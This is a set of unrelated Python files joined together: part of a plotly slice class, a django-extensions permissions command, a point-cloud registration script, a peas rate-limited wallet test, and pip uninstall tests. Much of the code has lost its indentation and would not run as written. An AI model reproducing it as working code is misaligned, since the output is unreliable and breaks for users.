            entirely shaded. On the other hand, applying a `fill`
            ratio less than one allows the creation of openings
            parallel to the edges.
        locations
            Specifies the location(s) of slices on the axis. When
            not specified, slices are created for all points of
            the x axis except the start and end.
locationssrc
Sets the source reference on Chart Studio Cloud for
`locations`.
show
Determines whether or not slice planes about the x
dimension are drawn.
"""
def __init__(
self,
arg=None,
fill=None,
locations=None,
locationssrc=None,
show=None,
**kwargs,
):
"""
Construct a new X object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of
:class:`plotly.graph_objs.volume.slices.X`
fill
Sets the fill ratio of the `slices`. The default fill
            value of the `slices` is 1, meaning that they are
            entirely shaded. On the other hand, applying a `fill`
            ratio less than one allows the creation of openings
            parallel to the edges.
        locations
            Specifies the location(s) of slices on the axis. When
            not specified, slices are created for all points of
            the x axis except the start and end.
locationssrc
Sets the source reference on Chart Studio Cloud for
`locations`.
show
Determines whether or not slice planes about the x
dimension are drawn.
Returns
-------
X
"""
super(X, self).__init__("x")
if "_parent" in kwargs:
self._parent = kwargs["_parent"]
return
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.volume.slices.X
constructor must be a dict or
an instance of :class:`plotly.graph_objs.volume.slices.X`"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
self._validate = kwargs.pop("_validate", True)
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("fill", None)
_v = fill if fill is not None else _v
if _v is not None:
self["fill"] = _v
_v = arg.pop("locations", None)
_v = locations if locations is not None else _v
if _v is not None:
self["locations"] = _v
_v = arg.pop("locationssrc", None)
_v = locationssrc if locationssrc is not None else _v
if _v is not None:
self["locationssrc"] = _v
_v = arg.pop("show", None)
_v = show if show is not None else _v
if _v is not None:
self["show"] = _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
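# Hedged usage sketch (added here, not part of the generated module): in practice this
# object is reached through the public graph_objects API, typically via plotly's "magic
# underscore" notation, rather than instantiated directly, e.g.
#
#     import numpy as np
#     import plotly.graph_objects as go
#     X, Y, Z = np.mgrid[-1:1:20j, -1:1:20j, -1:1:20j]
#     fig = go.Figure(go.Volume(
#         x=X.ravel(), y=Y.ravel(), z=Z.ravel(),
#         value=(X ** 2 + Y ** 2 + Z ** 2).ravel(),
#         slices_x=dict(show=True, locations=[0.0], fill=1.0),
#     ))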
|
the-stack_106_23811 | from django.core.management.base import BaseCommand
from django.contrib.auth.management import create_permissions as _create_permissions
from django_extensions.management.utils import signalcommand
try:
from django.apps import apps as django_apps
get_models = lambda: None
get_app = django_apps.get_app_config
get_all_apps = django_apps.get_app_configs
def create_permissions(app, models, verbosity):
_create_permissions(app, verbosity)
except ImportError:
from django.db.models import get_models, get_app
django_apps = None
def get_all_apps():
apps = set()
for model in get_models():
apps.add(get_app(model._meta.app_label))
return apps
create_permissions = _create_permissions
class Command(BaseCommand):
args = '<app app ...>'
help = 'reloads permissions for specified apps, or all apps if no args are specified'
@signalcommand
def handle(self, *args, **options):
apps = set()
if not args:
apps = get_all_apps()
else:
for arg in args:
apps.add(get_app(arg))
for app in apps:
create_permissions(app, get_models(), int(options.get('verbosity', 3)))
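# Hedged usage note (added here, not in the original file): as a management command this is
# invoked through manage.py, e.g. `python manage.py update_permissions` to rebuild permissions
# for every installed app, or `python manage.py update_permissions app_label` to restrict it
# to the named apps.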
|
the-stack_106_23812 | import time
import numpy as np
import torch
import torch.nn as nn
import open3d as o3d
import h5py
import math
import sklearn
import copy
from sklearn.neighbors import KDTree
from PIL import Image
import matplotlib.pyplot as plt
def show_point_cloud(src_, src_corr_, ref_, ref_corr_):
src = src_.copy()
src_corr = src_corr_.copy()
ref = ref_.copy()
ref_corr = ref_corr_.copy()
ref[:,1] = ref[:,1] + 2.5
ref_corr[:,1] = ref_corr[:,1] + 2.5
src_pcd = o3d.geometry.PointCloud()
src_corr_pcd = o3d.geometry.PointCloud()
ref_pcd = o3d.geometry.PointCloud()
ref_corr_pcd = o3d.geometry.PointCloud()
src_pcd.points = o3d.utility.Vector3dVector(src)
ref_pcd.points = o3d.utility.Vector3dVector(ref)
src_corr_pcd.points = o3d.utility.Vector3dVector(src_corr)
ref_corr_pcd.points = o3d.utility.Vector3dVector(ref_corr )
    ref_pcd.paint_uniform_color([1, 0, 0.651])  # pink/magenta
    # src_corr_pcd.paint_uniform_color([1, 0.706, 0])  # yellow
    src_pcd.paint_uniform_color([0, 0.651, 0.929])  # light blue
line_size = src_corr.shape[0]
    line_src = np.arange(0, 2 * line_size, 2)  # even indices: 0, 2, 4, ...
rand_idxs = np.random.choice(line_size, math.ceil(line_size / 3), replace=False)
# print('line_src',line_src)
line_src = line_src[rand_idxs].reshape(rand_idxs.shape[0], 1)
# print('line_src',line_src)
line_ref = line_src + 1
# print('line_ref',line_ref)
lines = np.concatenate([line_ref, line_src], -1).reshape(-1, 2)
# print('lines',lines)
colors = [[1, 0, 0]]
# triangle_points=np.concatenate([data['points_ref'][1, :, :3].detach().cpu().numpy()+1,data['points_src'][1, :, :3].detach().cpu().numpy()],-1)
triangle_points = np.concatenate([src_corr, ref_corr ], -1)
triangle_points = triangle_points.reshape(-1, 3)
# print('triangle_points',triangle_points.shape)
line_pcd = o3d.geometry.LineSet()
line_pcd.lines = o3d.utility.Vector2iVector(lines)
line_pcd.colors = o3d.utility.Vector3dVector(colors)
# line_pcd.paint_uniform_color([1, 0.706, 0])
line_pcd.points = o3d.utility.Vector3dVector(triangle_points)
o3d.visualization.draw_geometries([line_pcd, src_pcd, ref_pcd], window_name='line_pcd src_pcd src_corr_pcd')
# o3d.visualization.draw_geometries([src_corr_pcd, ref_pcd], window_name='src_corr_pcd ref_pcd')
# src_pcd.transform(transform)
# src_corr_pcd.points = o3d.utility.Vector3dVector(weighted_ref)
# o3d.visualization.draw_geometries([src_corr_pcd, src_pcd], window_name='src_corr_pcd src_pcd.transform(T)')
#
# ref_pcd.points = o3d.utility.Vector3dVector(ref)
# o3d.visualization.draw_geometries([src_pcd, ref_pcd], window_name='src_pcd.transform(T) ref_pcd')
def draw_registration_result(source, target, src_color, tgt_color):
src_pcd = o3d.geometry.PointCloud()
ref_pcd = o3d.geometry.PointCloud()
src_pcd.points = o3d.utility.Vector3dVector(source)
ref_pcd.points = o3d.utility.Vector3dVector(target)
src_pcd.colors = o3d.utility.Vector3dVector(src_color)
ref_pcd.colors = o3d.utility.Vector3dVector(tgt_color)
# src_pcd.paint_uniform_color([1, 0.706, 0])
# ref_pcd.paint_uniform_color([0, 0.651, 0.929])
o3d.visualization.draw_geometries([src_pcd, ref_pcd])
def draw_registration_result_no_blocking(source, target,vis):
vis.update_geometry(source)
vis.poll_events()
vis.update_renderer()
def get_npy_data(filename, index):
all_data = np.load(filename, allow_pickle=True)
# print(len(all_data))
# xyz_src = torch.from_numpy(all_data[index * 3])
# feat_src = torch.from_numpy(all_data[index * 3 + 2])
# xyz_ref = torch.from_numpy(all_data[index * 3 + 3])
# feat_ref = torch.from_numpy(all_data[index * 3 + 5])
xyz = all_data[index * 4]
normal = all_data[index * 4 + 1]
feat = all_data[index * 4 + 2]
color = all_data[index * 4 + 3]
return xyz, normal, feat, color
def calGrad(point,normal,feature,kdTree):
# n * 3; n * 3 ; n * d
N = point.shape[0]
d = feature.shape[1]
grads = np.zeros([N,3,d])
for i in range(N):
pt = point[i,:].reshape(1,-1)
nt = normal[i,:].reshape(1,-1)
ft = feature[i,:].reshape(1,-1)
_, idx = kdTree.query(pt, k=20, return_distance=True)
# idx_ = np.reshape(idx,(-1,1))
# neighbor_ = point[idx_, :]
# neighbor = np.reshape(neighbor_, (N,-1, 3))
neighbor_pt = point[idx, :].reshape(-1,3)
neighbor_ft = feature[idx,:].reshape(-1,d)
proj_pt = neighbor_pt - (neighbor_pt - pt) @ nt.T * nt
A = proj_pt - pt
b = neighbor_ft - ft
A = np.concatenate((A,nt),axis=0)
b = np.concatenate((b,np.zeros(d).reshape(1,d)))
x = np.linalg.inv(A.T@A)@A.T@b
grads[i,:,:] = x
return grads
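# Hedged usage sketch (added here; calGrad is defined but never called in this script):
# given N x 3 points and normals plus an N x d feature matrix, it returns an N x 3 x d
# array of per-point feature gradients fitted over each point's 20-nearest-neighbour
# tangent plane.
#
#     tree = KDTree(xyz_src)                                  # xyz_src etc. from get_npy_data
#     grads = calGrad(xyz_src, normal_src, feat_src, tree)    # grads.shape == (N, 3, d)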
def pt2plTrans(source,target,corr, weights):
ps = source.point[corr[:, 0], :]
pt = target.point[corr[:, 1], :]
nt = target.normal[corr[:, 1], :]
geo_A = np.concatenate((np.cross(ps, nt), nt), axis=1) * weights
geo_b = np.sum((ps-pt)*nt, axis=1,keepdims=True) * weights
Ja = geo_A
res = geo_b
vecTrans = -np.linalg.inv(Ja.T@Ja)@Ja.T@res
vecTrans = np.squeeze(vecTrans)
cx = np.cos(vecTrans[0])
cy = np.cos(vecTrans[1])
cz = np.cos(vecTrans[2])
sx = np.sin(vecTrans[0])
sy = np.sin(vecTrans[1])
sz = np.sin(vecTrans[2])
R = np.array([[cy*cz, sx*sy*cz-cx*sz, cx*sy*cz+sx*sz],
[cy*sz, cx*cz+sx*sy*sz, cx*sy*sz-sx*cz],
[-sy, sx*cy, cx*cy]])
t = vecTrans[3:]
transform = np.identity(4)
transform[0:3, 0:3] = R
transform[0:3, 3] = t
t = t.reshape(3, 1)
return R, t, transform
class PointCloud:
def __init__(self,point,normal,feature):
self.point = point
self.normal = normal
self.feature = feature
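# Hedged usage sketch (added here, not in the original script): pt2plTrans solves one
# weighted, linearized point-to-plane least-squares step. `corr` pairs row indices of
# `source` with row indices of `target`, and `weights` is an (N, 1) column of
# per-correspondence weights, mirroring how the registration loop below calls it.
#
#     n = src_xyz.shape[0]                                    # (n, 3) arrays assumed
#     src = PointCloud(src_xyz, src_normals, src_colors)
#     ref = PointCloud(ref_xyz, ref_normals, ref_colors)
#     corr = np.stack([np.arange(n), np.arange(n)], axis=1)   # identity correspondences
#     w = np.ones((n, 1)) / n
#     R, t, T = pt2plTrans(src, ref, corr, w)                 # 3x3 R, 3x1 t, 4x4 T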
def file2matrix(filename):
fr = open(filename)
numberOfLines = len(fr.readlines()) #get the number of lines in the file
trans = np.eye(4) #prepare matrix to return
truth = [] #prepare labels return
fr = open(filename)
index = 0
for line in fr.readlines():
line = line.strip()
# listFromLine = line.split('\t')
listFromLine = line.split()
listFromLine = [float(x) for x in listFromLine]
if(index % 5 ==0):
index = 0
elif(index % 5 ==1):
trans[0, :] = np.array(listFromLine)
elif(index % 5 ==2):
trans[1,:] = np.array(listFromLine)
elif(index % 5 ==3):
trans[2,:] = np.array(listFromLine)
elif(index % 5 ==4):
trans[3,:] = np.array(listFromLine)
            truth.append(trans.copy())  # without copy(), every appended element would reference the same array
index += 1
return truth
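# Hedged note on the assumed log layout (inferred from the parsing above): reg_output.log is
# read in blocks of five lines -- one header line followed by the four rows of a 4x4
# transform -- so file2matrix returns one 4x4 numpy array per block.
#
#     poses = file2matrix('/Bill/DataSet/RedWood/loft/reg_output.log')
#     print(poses[0].shape)    # (4, 4)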
if __name__ == '__main__':
root_path = '/Bill/DataSet/RedWood/'
dataset_names = ['loft', 'lobby', 'apartment','bedroom','boardroom']
root_save_path = '/sin_ours/src2ref'
dataset_numbers = [252,199,319,219,243]
for i in range(len(dataset_names)):
# for i in range(1):
file_path = root_path + dataset_names[i]
end = dataset_numbers[i]
save_path = dataset_names[i] + root_save_path
print(file_path)
groud_truth = file2matrix(file_path + '/reg_output.log')
voxel_size = 0.05 # means 5cm for this dataset
err_R = []
err_T = []
trans_all = []
fail_list = []
start = 0
for j in range(start, end):
print(
'j',j
)
# index_src = j + 1
# index_ref = j
index_src = j
index_ref = j + 1
source_show = o3d.io.read_point_cloud(file_path + "/mesh_%s.ply"%(index_src))
target_show = o3d.io.read_point_cloud(file_path + "/mesh_%s.ply"%(index_ref))
filename = file_path + '/xyz_nor_feat_color.npy'
xyz_src, normal_src, feat_src, color_src = get_npy_data(filename, index_src)
xyz_ref, normal_ref, feat_ref, color_ref = get_npy_data(filename, index_ref)
# draw_registration_result(xyz_src, xyz_ref, color_src, color_ref)
# print('feat_src', feat_src.shape, feat_ref.shape)
total_trans = np.eye(4)
# lambda_hybrid = 0.8
lambda_color_ge = 0
fail_flag = 0
for m in range(35):
lambda_hybrid = (np.sin(0.67 * 0.9 ** (m) * 1.68)) ** 2
src_hybrid_feature = np.concatenate(((lambda_hybrid) * feat_src,
((1 - lambda_hybrid) * lambda_color_ge) * color_src,
((1 - lambda_hybrid) * (1 - lambda_color_ge)) * xyz_src), 1)
ref_hybrid_feature = np.concatenate(((lambda_hybrid) * feat_ref,
((1 - lambda_hybrid) * lambda_color_ge) * color_ref,
((1 - lambda_hybrid) * (1 - lambda_color_ge)) * xyz_ref), 1)
# src_hybrid_feature = np.concatenate((np.sqrt(lambda_hybrid) * feat_src, np.sqrt((1-lambda_hybrid) * lambda_color_ge) * color_src, np.sqrt((1-lambda_hybrid) * (1-lambda_color_ge)) * xyz_src), 1)
# ref_hybrid_feature = np.concatenate((np.sqrt(lambda_hybrid) * feat_ref, np.sqrt((1-lambda_hybrid) * lambda_color_ge) * color_ref, np.sqrt((1-lambda_hybrid) * (1-lambda_color_ge)) * xyz_ref), 1)
feat_ref_tree = KDTree(ref_hybrid_feature)
                # for each src point, find its nearest ref point in hybrid feature space; corr holds ref indices
                dist_feat, corr = feat_ref_tree.query(src_hybrid_feature, k = 1, return_distance = True)
# print('dist_feat',dist_feat.shape)
corr_xyz_ref = xyz_ref[corr].reshape(-1,3)
corr_xyz_src = xyz_src
distance_threshold = np.sqrt(lambda_hybrid ** 2 * 0.4 + ((1-lambda_hybrid) * lambda_color_ge) ** 2 * 0.3 + ((1 - lambda_hybrid) * (1-lambda_color_ge)) ** 2 * 0.3 )
                # keep only matches whose feature distance passes the threshold; the surviving entries index into ref
                ref_correct_corr = corr[dist_feat < distance_threshold]
ref_correct_xyz = xyz_ref[ref_correct_corr]
ref_correct_normal = normal_ref[ref_correct_corr]
ref_correct_color = color_ref[ref_correct_corr]
if ref_correct_xyz.shape[0] == 0:
fail_flag = 1
continue
                # src indices simply run 0..n-1, so the positions where dist_feat passes the threshold are the src indices themselves
                src_correct_corr = np.where((np.array(dist_feat < distance_threshold) > 0 ).reshape(-1, 1))[0]
src_correct_xyz = xyz_src[src_correct_corr]
src_correct_normal = normal_src[src_correct_corr]
src_correct_color = color_src[src_correct_corr]
source = PointCloud(src_correct_xyz, src_correct_normal, src_correct_color)
target = PointCloud(ref_correct_xyz, ref_correct_normal, ref_correct_color)
                # dist_feat is indexed by src point, so the surviving src indices pick out their own src-to-ref distances
                useful_dis = dist_feat[src_correct_corr]
# show_point_cloud(corr_xyz_src, src_correct_xyz, xyz_ref, ref_correct_xyz)
                # alternative weightings: uniform np.ones(src_correct_xyz.shape[0]).reshape(-1,1), or a colour-difference term np.sum(np.power((src_correct_color - ref_correct_color), 2), 1).reshape(-1,1)
                weights = np.exp(-useful_dis/0.1).reshape(-1,1)  # soft weight per surviving correspondence, decaying with feature distance
weights = weights/np.sum(weights)
# print('corr_xyz_ref',i , distance_threshold, ref_correct_corr.shape, xyz_src.shape, xyz_ref.shape, weights.shape,src_correct_corr.shape)
N = src_correct_xyz.shape[0]
corr_src = np.array(range(N)).reshape(N, 1)
                corr = np.concatenate((corr_src, corr_src), axis=1)  # valid src/ref points are already row-aligned, so the correspondence is the identity
R, t, transform = pt2plTrans(source, target, corr, weights)# 1 - 0.002 * i
xyz_src = (R @ xyz_src.T + t).T
source_show.transform(transform)
lambda_hybrid = 0.9 * lambda_hybrid
total_trans = transform @ total_trans
if fail_flag == 1:
total_trans = np.eye(4)
fail_list.append(j)
print('fail', j)
R = total_trans[:3,:3].reshape(3,3)
t = total_trans[:3,3].reshape(-1,1)
if index_src > index_ref:
err_R.append(np.arccos((np.trace(R.T @ groud_truth[j][:3,:3]) - 1) / 2) * 180 / np.pi )
err_T.append(np.linalg.norm(t - groud_truth[j][:3,3].reshape(-1,1), ord=2,axis=0))
trans_all.append((total_trans))
else:
err_R.append( np.arccos( (np.trace(R @ groud_truth[j][:3,:3] ) - 1) / 2) * 180 / np.pi )
err_T.append(np.linalg.norm(-R.T @ t - groud_truth[j][:3,3].reshape(-1,1), ord=2,axis=0))
trans_all.append((total_trans))
# print(total_trans[:3,:3] @ groud_truth[j][:3,:3], np.trace(total_trans[:3,:3] @ groud_truth[j][:3,:3] - np.eye(3)))
# print(total_trans, groud_truth[j])
print('err_R err_T', err_R[j - start], err_T[j - start],total_trans)
if index_src > index_ref:
#
# location = str(start) + '_' + str(end)
err_all = [err_R, err_T]
plt.figure("ERR_R ref2src") # 图像窗口名称
plt.plot(err_R)
plt.savefig(save_path + '/%s_%s_err_All_ref2src.jpg'%(start, end))
# plt.show()
plt.close()
plt.figure("ERR_T ref2src") # 图像窗口名称
plt.plot(err_T)
plt.savefig(save_path + '/%s_%s_trans_all_ref2src.jpg' % (start, end))
# plt.show()
plt.close()
np.savetxt(save_path + '/%s_%s_fail_list_ref2src.txt'%(start, end), fail_list)
np.save(save_path + '/%s_%s_err_All_ref2src.npy'%(start, end), err_all)
np.savetxt(save_path + '/%s_%s_err_All_ref2src.txt' % (start, end), err_all)
np.save(save_path + '/%s_%s_trans_all_ref2src.npy'%(start, end), trans_all)
np.savetxt(save_path + '/%s_%s_trans_all_ref2src.txt'%(start, end), np.array(trans_all).reshape(-1,4),fmt='%0.8f')
else:
err_all = [err_R, err_T]
plt.figure("ERR_R src2ref") # 图像窗口名称
plt.plot(err_R)
plt.savefig(save_path + '/%s_%serr_All_src2ref.jpg'%(start, end))
# plt.show()
plt.close()
plt.figure("ERR_T src2ref") # 图像窗口名称
plt.plot(err_T)
plt.savefig(save_path + '/%s_%strans_all_src2ref.jpg' % (start, end))
# plt.show()
plt.close()
np.savetxt(save_path + '/%s_%s_fail_list_src2ref.txt'%(start, end), fail_list)
np.savetxt(save_path + '/%s_%serr_All_src2ref.txt' % (start, end), err_all)
np.save(save_path + '/%s_%serr_All_src2ref.npy'%(start, end), err_all)
np.save(save_path + '/%s_%strans_all_src2ref.npy'%(start, end), trans_all)
np.savetxt(save_path + '/%s_%strans_all_src2ref.txt'%(start, end), np.array(trans_all).reshape(-1,4),fmt='%0.8f')
|
the-stack_106_23815 | import asyncio
import pytest
from peas.rpc.wallet_rpc_api import WalletRpcApi
from peas.simulator.simulator_protocol import FarmNewBlockProtocol
from peas.types.blockchain_format.coin import Coin
from peas.types.blockchain_format.sized_bytes import bytes32
from peas.types.mempool_inclusion_status import MempoolInclusionStatus
from peas.types.peer_info import PeerInfo
from peas.util.bech32m import encode_puzzle_hash
from peas.util.ints import uint16
from peas.wallet.util.wallet_types import WalletType
from tests.setup_nodes import self_hostname, setup_simulators_and_wallets
from tests.time_out_assert import time_out_assert
from tests.wallet.sync.test_wallet_sync import wallet_height_at_least
@pytest.fixture(scope="module")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
async def is_transaction_in_mempool(user_wallet_id, api, tx_id: bytes32) -> bool:
try:
val = await api.get_transaction({"wallet_id": user_wallet_id, "transaction_id": tx_id.hex()})
except ValueError:
return False
for _, mis, _ in val["transaction"].sent_to:
if (
MempoolInclusionStatus(mis) == MempoolInclusionStatus.SUCCESS
or MempoolInclusionStatus(mis) == MempoolInclusionStatus.PENDING
):
return True
return False
async def is_transaction_confirmed(user_wallet_id, api, tx_id: bytes32) -> bool:
try:
val = await api.get_transaction({"wallet_id": user_wallet_id, "transaction_id": tx_id.hex()})
except ValueError:
return False
return val["transaction"].confirmed
async def check_balance(api, wallet_id):
balance_response = await api.get_wallet_balance({"wallet_id": wallet_id})
balance = balance_response["wallet_balance"]["confirmed_wallet_balance"]
return balance
class TestRLWallet:
@pytest.fixture(scope="function")
async def three_wallet_nodes(self):
async for _ in setup_simulators_and_wallets(1, 3, {}):
yield _
@pytest.mark.asyncio
async def test_create_rl_coin(self, three_wallet_nodes):
num_blocks = 4
full_nodes, wallets = three_wallet_nodes
full_node_api = full_nodes[0]
full_node_server = full_node_api.server
wallet_node, server_2 = wallets[0]
wallet_node_1, wallet_server_1 = wallets[1]
wallet_node_2, wallet_server_2 = wallets[2]
wallet = wallet_node.wallet_state_manager.main_wallet
ph = await wallet.get_new_puzzlehash()
await server_2.start_client(PeerInfo(self_hostname, uint16(full_node_server._port)), None)
await wallet_server_1.start_client(PeerInfo(self_hostname, uint16(full_node_server._port)), None)
await wallet_server_2.start_client(PeerInfo(self_hostname, uint16(full_node_server._port)), None)
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(ph))
for i in range(0, num_blocks + 1):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(32 * b"\0"))
await time_out_assert(15, wallet_height_at_least, True, wallet_node, 6)
fund_owners_initial_balance = await wallet.get_confirmed_balance()
api_user = WalletRpcApi(wallet_node_1)
val = await api_user.create_new_wallet(
{"wallet_type": "rl_wallet", "rl_type": "user", "host": f"{self_hostname}:5000"}
)
assert isinstance(val, dict)
if "success" in val:
assert val["success"]
assert val["id"]
assert val["type"] == WalletType.RATE_LIMITED.value
user_wallet_id = val["id"]
pubkey = val["pubkey"]
api_admin = WalletRpcApi(wallet_node)
val = await api_admin.create_new_wallet(
{
"wallet_type": "rl_wallet",
"rl_type": "admin",
"interval": 2,
"limit": 10,
"pubkey": pubkey,
"amount": 100,
"fee": 1,
"host": f"{self_hostname}:5000",
}
)
assert isinstance(val, dict)
if "success" in val:
assert val["success"]
assert val["id"]
assert val["type"] == WalletType.RATE_LIMITED.value
assert val["origin"]
assert val["pubkey"]
admin_wallet_id = val["id"]
admin_pubkey = val["pubkey"]
origin: Coin = val["origin"]
await api_user.rl_set_user_info(
{
"wallet_id": user_wallet_id,
"interval": 2,
"limit": 10,
"origin": {
"parent_coin_info": origin.parent_coin_info.hex(),
"puzzle_hash": origin.puzzle_hash.hex(),
"amount": origin.amount,
},
"admin_pubkey": admin_pubkey,
}
)
assert (await api_user.get_wallet_balance({"wallet_id": user_wallet_id}))["wallet_balance"][
"confirmed_wallet_balance"
] == 0
for i in range(0, 2 * num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(32 * b"\0"))
await time_out_assert(15, wallet_height_at_least, True, wallet_node, 14)
assert await wallet.get_confirmed_balance() == fund_owners_initial_balance - 101
assert await check_balance(api_user, user_wallet_id) == 100
receiving_wallet = wallet_node_2.wallet_state_manager.main_wallet
address = encode_puzzle_hash(await receiving_wallet.get_new_puzzlehash(), "pea")
assert await receiving_wallet.get_spendable_balance() == 0
val = await api_user.send_transaction({"wallet_id": user_wallet_id, "amount": 3, "fee": 2, "address": address})
assert "transaction_id" in val
await time_out_assert(15, is_transaction_in_mempool, True, user_wallet_id, api_user, val["transaction_id"])
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(32 * b"\0"))
await time_out_assert(15, wallet_height_at_least, True, wallet_node, 18)
assert await is_transaction_confirmed(user_wallet_id, api_user, val["transaction_id"])
assert await check_balance(api_user, user_wallet_id) == 95
assert await receiving_wallet.get_spendable_balance() == 3
val = await api_admin.add_rate_limited_funds({"wallet_id": admin_wallet_id, "amount": 100, "fee": 7})
assert val["status"] == "SUCCESS"
for i in range(0, 50):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(32 * b"\0"))
await time_out_assert(15, wallet_height_at_least, True, wallet_node, 68)
assert await check_balance(api_user, user_wallet_id) == 195
# test spending
puzzle_hash = encode_puzzle_hash(await receiving_wallet.get_new_puzzlehash(), "pea")
val = await api_user.send_transaction(
{"wallet_id": user_wallet_id, "amount": 105, "fee": 0, "address": puzzle_hash}
)
await time_out_assert(15, is_transaction_in_mempool, True, user_wallet_id, api_user, val["transaction_id"])
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(32 * b"\0"))
await time_out_assert(15, wallet_height_at_least, True, wallet_node, 72)
assert await is_transaction_confirmed(user_wallet_id, api_user, val["transaction_id"])
assert await check_balance(api_user, user_wallet_id) == 90
assert await receiving_wallet.get_spendable_balance() == 108
val = await api_admin.send_clawback_transaction({"wallet_id": admin_wallet_id, "fee": 11})
await time_out_assert(15, is_transaction_in_mempool, True, user_wallet_id, api_admin, val["transaction_id"])
for i in range(0, num_blocks):
await full_node_api.farm_new_transaction_block(FarmNewBlockProtocol(32 * b"\0"))
await time_out_assert(15, wallet_height_at_least, True, wallet_node, 76)
assert await is_transaction_confirmed(user_wallet_id, api_admin, val["transaction_id"])
assert await check_balance(api_user, user_wallet_id) == 0
final_balance = await wallet.get_confirmed_balance()
assert final_balance == fund_owners_initial_balance - 129
|
the-stack_106_23816 | from __future__ import with_statement
import json
import logging
import os
import sys
import textwrap
from os.path import join, normpath
from tempfile import mkdtemp
import pretend
import pytest
from pip._internal.req.constructors import install_req_from_line
from pip._internal.utils.misc import rmtree
from tests.lib import (
assert_all_changes,
create_test_package_with_setup,
need_svn,
)
from tests.lib.local_repos import local_checkout, local_repo
@pytest.mark.network
def test_basic_uninstall(script):
"""
Test basic install and uninstall.
"""
result = script.pip('install', 'INITools==0.2')
assert join(script.site_packages, 'initools') in result.files_created, (
sorted(result.files_created.keys())
)
# the import forces the generation of __pycache__ if the version of python
# supports it
script.run('python', '-c', "import initools")
result2 = script.pip('uninstall', 'INITools', '-y')
assert_all_changes(result, result2, [script.venv / 'build', 'cache'])
def test_basic_uninstall_distutils(script):
"""
Test basic install and uninstall.
"""
script.scratch_path.joinpath("distutils_install").mkdir()
pkg_path = script.scratch_path / 'distutils_install'
pkg_path.joinpath("setup.py").write_text(textwrap.dedent("""
from distutils.core import setup
setup(
name='distutils-install',
version='0.1',
)
"""))
result = script.run('python', pkg_path / 'setup.py', 'install')
result = script.pip('list', '--format=json')
assert {"name": "distutils-install", "version": "0.1"} \
in json.loads(result.stdout)
result = script.pip('uninstall', 'distutils_install', '-y',
expect_stderr=True, expect_error=True)
assert (
"Cannot uninstall 'distutils-install'. It is a distutils installed "
"project and thus we cannot accurately determine which files belong "
"to it which would lead to only a partial uninstall."
) in result.stderr
@pytest.mark.network
def test_basic_uninstall_with_scripts(script):
"""
Uninstall an easy_installed package with scripts.
"""
result = script.easy_install('PyLogo', expect_stderr=True)
easy_install_pth = script.site_packages / 'easy-install.pth'
pylogo = sys.platform == 'win32' and 'pylogo' or 'PyLogo'
assert(pylogo in result.files_updated[easy_install_pth].bytes)
result2 = script.pip('uninstall', 'pylogo', '-y')
assert_all_changes(
result,
result2,
[script.venv / 'build', 'cache', easy_install_pth],
)
@pytest.mark.network
def test_uninstall_easy_install_after_import(script):
"""
Uninstall an easy_installed package after it's been imported
"""
result = script.easy_install('--always-unzip', 'INITools==0.2',
expect_stderr=True)
# the import forces the generation of __pycache__ if the version of python
# supports it
script.run('python', '-c', "import initools")
result2 = script.pip('uninstall', 'INITools', '-y')
assert_all_changes(
result,
result2,
[
script.venv / 'build',
'cache',
script.site_packages / 'easy-install.pth',
]
)
@pytest.mark.network
def test_uninstall_trailing_newline(script):
"""
Uninstall behaves appropriately if easy-install.pth
lacks a trailing newline
"""
script.easy_install('INITools==0.2', expect_stderr=True)
script.easy_install('PyLogo', expect_stderr=True)
easy_install_pth = script.site_packages_path / 'easy-install.pth'
# trim trailing newline from easy-install.pth
with open(easy_install_pth) as f:
pth_before = f.read()
with open(easy_install_pth, 'w') as f:
f.write(pth_before.rstrip())
# uninstall initools
script.pip('uninstall', 'INITools', '-y')
with open(easy_install_pth) as f:
pth_after = f.read()
# verify that only initools is removed
before_without_initools = [
line for line in pth_before.splitlines()
if 'initools' not in line.lower()
]
lines_after = pth_after.splitlines()
assert lines_after == before_without_initools
@pytest.mark.network
def test_basic_uninstall_namespace_package(script):
"""
Uninstall a distribution with a namespace package without clobbering
the namespace and everything in it.
"""
result = script.pip('install', 'pd.requires==0.0.3')
assert join(script.site_packages, 'pd') in result.files_created, (
sorted(result.files_created.keys())
)
result2 = script.pip('uninstall', 'pd.find', '-y')
assert join(script.site_packages, 'pd') not in result2.files_deleted, (
sorted(result2.files_deleted.keys())
)
assert join(script.site_packages, 'pd', 'find') in result2.files_deleted, (
sorted(result2.files_deleted.keys())
)
def test_uninstall_overlapping_package(script, data):
"""
Uninstalling a distribution that adds modules to a pre-existing package
should only remove those added modules, not the rest of the existing
package.
See: GitHub issue #355 (pip uninstall removes things it didn't install)
"""
parent_pkg = data.packages.joinpath("parent-0.1.tar.gz")
child_pkg = data.packages.joinpath("child-0.1.tar.gz")
result1 = script.pip('install', parent_pkg)
assert join(script.site_packages, 'parent') in result1.files_created, (
sorted(result1.files_created.keys())
)
result2 = script.pip('install', child_pkg)
assert join(script.site_packages, 'child') in result2.files_created, (
sorted(result2.files_created.keys())
)
assert normpath(
join(script.site_packages, 'parent/plugins/child_plugin.py')
) in result2.files_created, sorted(result2.files_created.keys())
# The import forces the generation of __pycache__ if the version of python
# supports it
script.run('python', '-c', "import parent.plugins.child_plugin, child")
result3 = script.pip('uninstall', '-y', 'child')
assert join(script.site_packages, 'child') in result3.files_deleted, (
sorted(result3.files_created.keys())
)
assert normpath(
join(script.site_packages, 'parent/plugins/child_plugin.py')
) in result3.files_deleted, sorted(result3.files_deleted.keys())
assert join(script.site_packages, 'parent') not in result3.files_deleted, (
sorted(result3.files_deleted.keys())
)
# Additional check: uninstalling 'child' should return things to the
# previous state, without unintended side effects.
assert_all_changes(result2, result3, [])
